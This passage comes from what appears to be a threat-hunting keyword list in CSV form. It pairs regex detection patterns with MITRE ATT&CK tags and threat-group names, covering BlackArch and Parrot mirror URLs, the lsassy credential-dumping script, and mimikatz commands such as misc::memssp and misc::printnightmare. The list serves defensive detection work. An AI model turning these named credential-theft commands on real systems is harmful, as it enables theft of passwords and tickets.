OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52106" "*mirror.telepoint.bg/blackarch/*/os/*",".{0,1000}mirror\.telepoint\.bg\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation 
OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52107" "*mirror.tillo.ch/ftp/blackarch/*/os/*",".{0,1000}mirror\.tillo\.ch\/ftp\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52108" "*mirror.yandex.ru/mirrors/blackarch/*/os/*",".{0,1000}mirror\.yandex\.ru\/mirrors\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52109" "*mirror.zetup.net/blackarch/*/os/*",".{0,1000}mirror\.zetup\.net\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52110" "*mirrordump.py*",".{0,1000}mirrordump\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","52111" "*mirrors.aliyun.com/blackarch/*/os/*",".{0,1000}mirrors\.aliyun\.com\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation 
OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52112" "*mirrors.aliyun.com/parrot*",".{0,1000}mirrors\.aliyun\.com\/parrot.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52113" "*mirrors.cicku.me/blackarch/*/os/*",".{0,1000}mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52114" "*mirrors.dotsrc.org/blackarch/*/os/*",".{0,1000}mirrors\.dotsrc\.org\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52115" "*mirrors.gethosted.online/blackarch/blackarch/*/os/*",".{0,1000}mirrors\.gethosted\.online\/blackarch\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52116" 
"*mirrors.hostico.ro/blackarch/*/os/*",".{0,1000}mirrors\.hostico\.ro\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52117" "*mirrors.hust.edu.cn/blackarch/*/os/*",".{0,1000}mirrors\.hust\.edu\.cn\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52118" "*mirrors.nju.edu.cn/blackarch/*/os/*",".{0,1000}mirrors\.nju\.edu\.cn\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52119" "*mirrors.ocf.berkeley.edu/blackarch/*/os/*",".{0,1000}mirrors\.ocf\.berkeley\.edu\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52120" "*mirrors.tuna.tsinghua.edu.cn/blackarch/*/os/*",".{0,1000}mirrors\.tuna\.tsinghua\.edu\.cn\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation 
OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52121" "*mirrors.ustc.edu.cn/blackarch/*/os/*",".{0,1000}mirrors\.ustc\.edu\.cn\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","52122" "*misc::aadcookie*",".{0,1000}misc\:\:aadcookie.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation 
tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52123" "*misc::clip*",".{0,1000}misc\:\:clip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52124" "*misc::cmd*",".{0,1000}misc\:\:cmd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52125" "*misc::compress*",".{0,1000}misc\:\:compress.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52126" "*misc::detours*",".{0,1000}misc\:\:detours.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52127" "*misc::efs*",".{0,1000}misc\:\:efs.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52128" "*misc::lock*",".{0,1000}misc\:\:lock.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52129" "*misc::memssp*",".{0,1000}misc\:\:memssp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52130" "*misc::mflt*",".{0,1000}misc\:\:mflt.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52131" "*misc::ncroutemon*",".{0,1000}misc\:\:ncroutemon.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52132" "*misc::ngcsign*",".{0,1000}misc\:\:ngcsign.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52133" "*misc::printnightmare*",".{0,1000}misc\:\:printnightmare.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52134" "*misc::printnightmare*",".{0,1000}misc\:\:printnightmare.{0,1000}","offensive_tool_keyword","PrintNightmare","mimikatz printnightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","52135" "*misc::regedit*",".{0,1000}misc\:\:regedit.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52136" "*misc::sccm*",".{0,1000}misc\:\:sccm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52137" 